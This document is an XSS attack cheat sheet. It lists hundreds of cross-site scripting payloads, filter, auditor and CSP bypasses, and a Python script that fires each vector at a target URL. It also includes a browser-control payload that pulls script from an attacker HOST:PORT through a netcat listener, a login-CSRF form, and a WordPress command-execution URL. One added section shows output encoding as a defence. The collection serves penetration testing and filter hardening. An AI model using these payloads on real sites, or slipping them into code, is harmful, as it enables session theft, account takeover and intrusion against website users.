List of Typical Attack Vectors
<script>alert(1)</script>
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<BODY ONLOAD=alert('XSS')>
"><object onbeforescriptexecute=confirm(1)>
"><object onafterscriptexecute=confirm(0)>
<svg onload=alert(1)>
"><svg onload=alert(1)//
'-alert(1)-'
'-alert(1)//
\'-alert(1)//
<svg onload=top.onerror=alert;throw'1'>
<svg onload=top.onerror=alert;throw[1]>
<svg onload=alert1
>
x#<body onload=confirm('XSSPOSED')>
<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><a href=#x>click this!#x
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><x id=x>#x
<script src=javascript:alert(1)>
"><img src=/ onerror=alert(2)>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:alert(1);//
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
%CA%BA>%EF%BC%9Csvg/onload%EF%BC%9Dalert%EF%BC%881)>
<svg><set onbegin=alert(1)>
</script><svg><script>alert(1)//
"-alert(1)</script><script>
';onerror=alert;throw 1//
<x onmouseenter=alert(1)>
<x onafterscriptexecute=alert(1)>
<x onbeforescriptexecute=alert(1)>
<x onanimationend=alert(1)><style>x{animation:s}@keyframes s{}
<x onwebkitanimationend=alert(1)><style>x{animation:s}@keyframes s{}
<svg><use xlink:href=%2BPGVtYmVkIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIiBzcmM9ImphdmFzY3JpcHQ6YWxlcnQoMSkiLz48L3N2Zz4=%23x>
Script to open each XSS vector directly against a URL
#!/usr/bin/env python3
import sys
import webbrowser

# Usage: script.py BASE_URL VECTORS_FILE
# Appends each line of VECTORS_FILE to BASE_URL and opens it in a Firefox tab.
url = sys.argv[1]
vectors = sys.argv[2]
with open(vectors, 'r') as f:
    for line in f:
        xss = url + line.rstrip('\n')
        try:
            # The controller returned by get() must be used; calling get()
            # and then the module-level open_new_tab() would ignore Firefox.
            webbrowser.get('firefox').open_new_tab(xss)
        except Exception as e:
            print("Cannot open url: %s" % e)
Full list of vectors
HTML Context
Tag Injection
<svg onload=alert(1)>
"><svg onload=alert(1)//
HTML Context
Inline Injection
"onmouseover=alert(1)//
"autofocus/onfocus=alert(1)//
Javascript Context
Code Injection
'-alert(1)-'
'-alert(1)//
Javascript Context
Code Injection
(escaping the escape)
\'-alert(1)//
Javascript Context
Tag Injection
</script><svg onload=alert(1)>
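An added example, not from the cheat sheet, showing how each context above is neutralised by context-specific output encoding, and why the "escaping the escape" vector defeats a JS-string escaper that only prefixes quotes with a backslash. The vector strings are the ones listed above; the function names are this example's own.

```python
import html

# Constructed inputs: the context-classified vectors from the list above
HTML_TAG_VECTOR = "<svg onload=alert(1)>"
HTML_ATTR_VECTOR = '"onmouseover=alert(1)//'
JS_CODE_VECTOR = "'-alert(1)-'"
JS_ESCAPE_VECTOR = "\\'-alert(1)//"   # "escaping the escape"

def encode_html(s):
    """HTML tag and inline (attribute) contexts: entity-encode < > & " '.
    The attribute must also be quoted in the template, e.g. value="{}"."""
    return html.escape(s, quote=True)

def js_string_naive(s):
    """Only backslash-prefixes quotes: a common but broken JS escaper."""
    return s.replace("'", "\\'")

def js_string_safe(s):
    """JavaScript string context: \\xHH / \\uHHHH every non-alphanumeric
    character, so no input can close the literal, open a comment or
    close the surrounding <script> element."""
    out = []
    for ch in s:
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif ord(ch) < 0x100:
            out.append("\\x%02x" % ord(ch))
        else:
            out.append("\\u%04x" % ord(ch))
    return "".join(out)

def js_literal_closes_early(encoded):
    """Walk the literal in  var x='<encoded>';  as the JS lexer would and
    report whether an unescaped quote ends it before the template's own
    closing quote (i.e. the payload reached code context)."""
    escaped = False
    for ch in encoded:
        if escaped:
            escaped = False
        elif ch == "\\":
            escaped = True
        elif ch == "'":
            return True
    return False
```

The naive escaper survives `'-alert(1)-'` but turns `\'-alert(1)//` into `\\'...`, where the input backslash consumes the added one and the quote closes the literal.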
PHP_SELF Injection
http://DOMAIN/PAGE.php/"><svg onload=alert(1)>
Without Parenthesis
<svg onload=alert1
>
<svg onload=alert(1)>
<svg onload=top.onerror=alert;throw'1'>
<svg onload=top.onerror=alert;throw[1]>
Filter Bypass
Alert Obfuscation
(alert)(1)
a=alert,a(1)
[1].find(alert)
top"al"+"ert"
al\u0065rt(1)
top'al\145rt'
top'al\x65rt'
Body Tag
<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><a href=#x>click this!#x
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><x id=x>#x
<body onresize=alert(1)>press F12!
<body onhelp=alert(1)>press F1! (MSIE)
Miscellaneous Vectors
<marquee onstart=alert(1)>
<marquee loop=1 width=0 onfinish=alert(1)>
<audio src onloadstart=alert(1)>
<video onloadstart=alert(1)><source>
<input autofocus onblur=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form onsubmit=alert(1)><input type=submit>
<select onchange=alert(1)><option>1<option>2
<menu id=x contextmenu=x onshow=alert(1)>right click me!
Agnostic Event Handlers
<x contenteditable onblur=alert(1)>lose focus!
<x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this!
<x oncontextmenu=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x ondblclick=alert(1)>double click this!
<x ondrag=alert(1)>drag this!
<x contenteditable onfocus=alert(1)>focus this!
<x contenteditable oninput=alert(1)>input here!
<x contenteditable onkeydown=alert(1)>press any key!
<x contenteditable onkeypress=alert(1)>press any key!
<x contenteditable onkeyup=alert(1)>press any key!
<x onmousedown=alert(1)>click this!
<x onmousemove=alert(1)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(1)>click this!
<x contenteditable onpaste=alert(1)>paste here!
<x onmouseenter=alert(1)>hover me!
<x onafterscriptexecute=alert(1)>
<x onbeforescriptexecute=alert(1)>
Code Reuse
Inline Script
<script>alert(1)//
<script>alert(1)<!--
Code Reuse
Regular Script
<script src=//brutelogic.com.br/1.js>
<script src=//3334957647/1>
Filter Bypass
Generic Tag + Handler
Encoding
%3Cx onxxx=1
<%78 onxxx=1
<x %6Fnxxx=1
<x o%6Exxx=1
<x on%78xx=1
<x onxxx%3D1
Mixed Case
<X onxxx=1
<x OnXxx=1
<X OnXxx=1
Doubling
<x onxxx=1 onxxx=1
Spacers
<x/onxxx=1
<x%09onxxx=1
<x%0Aonxxx=1
<x%0Conxxx=1
<x%0Donxxx=1
<x%2Fonxxx=1
Quotes Stripping
<x 1='1'onxxx=1
<x 1="1"onxxx=1
Mimetism
<[S]x onx[S]xx=1
[S] = stripped char or string
<x </onxxx=1
<x 1=">" onxxx=1
<http://onxxx%3D1/
Generic Source Breaking
<x onxxx=alert(1) 1='
Browser Control
<svg onload=setInterval(function(){with(document)body.
appendChild(createElement('script')).src='//HOST:PORT'},0)>
$ while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
Multi Reflection
Double Reflection
Single Input
'onload=alert(1)><svg/1='
Single Input (script-based)
'>alert(1)</script><script/1='
/alert(1)</script><script>/
Triple Reflection
Single Input
/alert(1)">'onload="/<svg/1='
-alert(1)">'onload="<svg/1='
Single Input (script-based)
/</script>'>alert(1)/<script/1='
Multi Input
Double Input
p=<svg/1='&q='onload=alert(1)>
Triple Input
p=<svg 1='&q='onload='/&r=/alert(1)'>
Without Event Handlers
<script>alert(1)</script>
<script src=javascript:alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/onload=alert(1)>>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
<svg><x><script>alert(1)</x>
<svg><use xlink:href='
Mobile Only
Event Handlers
<html ontouchstart=alert(1)>
<html ontouchend=alert(1)>
<html ontouchmove=alert(1)>
<html ontouchcancel=alert(1)>
<body onorientationchange=alert(1)>
Javascript
Properties
<svg onload=alert(navigator.connection.type)>
<svg onload=alert(navigator.battery.level)>
<svg onload=alert(navigator.battery.dischargingTime)>
<svg onload=alert(navigator.battery.charging)>
Functions
<svg onload=navigator.vibrate(500)>
<svg onload=navigator.vibrate([500,300,100])>
Generic Self to Regular XSS
<iframe src=LOGOUT_URL onload=forms[0].submit()>
</iframe><form method=post action=LOGIN_URL>
<input name=USERNAME_PARAMETER_NAME value=USERNAME>
<input name=PASSWORD_PARAMETER_NAME value=PASSWORD>
File Upload
Injection in Filename
"><img src=1 onerror=alert(1)>.gif
Injection in Metadata
$ exiftool -Artist='"><img src=1 onerror=alert(1)>' FILENAME.jpeg
Injection with SVG File
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
Injection with GIF File as Source of Script (CSP Bypass)
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;
Google Chrome
Auditor Bypass
(up to v51)
<script src="data:,alert(1)//
"><script src=data:,alert(1)//
<script src="//brutelogic.com.br/1.js#
"><script src=//brutelogic.com.br/1.js#
<link rel=import href="data:text/html,<script>alert(1)</script>
"><link rel=import href=data:text/html,<script>alert(1)</script>
"><embed allowscriptaccess=always src=//brutelogic.com.br/2.swf#
<embed allowscriptaccess=always src="//brutelogic.com.br/2.swf#
"><object allowscriptaccess=always data=//brutelogic.com.br/2.swf#
<object allowscriptaccess=always data="//brutelogic.com.br/2.swf#
"><base href=//HOST/
<base href="//HOST/
PHP File for XHR Remote Call
<?php header("Access-Control-Allow-Origin: *"); ?>
<img src=1 onerror=alert(1)>
Server Log Avoidance
<svg onload=eval(URL.slice(-8))>#alert(1)
<svg onload=eval(location.hash.slice(1))>#alert(1)
<svg onload=innerHTML=location.hash>#<script>alert(1)</script>
Shortest PoC
<base href=//0>
$ while :; do echo "alert(1)" | nc -lp80; done
Portable Wordpress RCE
<script/src="data:,eval(atob(location.hash.slice(1)))//#
http://DOMAIN/WP-ROOT/wp-content/plugins/akismet/index.php?brute=CMD
Multi Context Source-based
</script>"-alert(0)-"><svg onload=';alert(1);'>
DOM-based
//3334957647/0/?0=">"<img src='-alert(1)-' onerror=";alert(1);">
CSP Bypass
<script/src=/PATH/PAGE.json?callback=alert(1)//></script>
Shortest Event Handler
<svg><animate attributename=x end=1 onend=alert(1)>
Best-fit Mappings Uppercase
<SCRİPT>alert(1)</SCRİPT>
<SCRİPT/SRC=data:,alert(1)>
Overlong UTF-8
ʺ><svg onload=alert(1)>
%CA%BA%EF%BC%9E%EF%BC%9Csvg onload
%EF%BC%9Dalert%EF%BC%881%EF%BC%89%EF%BC%9E
In URLs: & => %26 , # => %23 , + => %2B
XSS bypass up to Chrome v60
<link rel=import href="data:,%%0D3Cscript>alert(1)%%0D3C%%0D2Fscript>
<iframe src="javascript:alert(1)%%0D3C!--
Chrome v62
%3Cform%3E%3Cinput+type=image+src=//domain/file.jpg+formaction=%22javascript:alert(1)%%0D3C!-%2D
IE11 and Microsoft Edge
%27;onerror=alert;throw%271
XSS in XML files
<_:script xmlns:_="hxxp://www.w3.org/1999/xhtml">alert(1)</_:script>
DOM XSS bypass:
\74svg o\156load=alert\501\51>
ASP filter bypass:
%u003csvg onload=alert(1)>
%u3008svg onload=alert(2)>
%uff1csvg onload=alert(3)>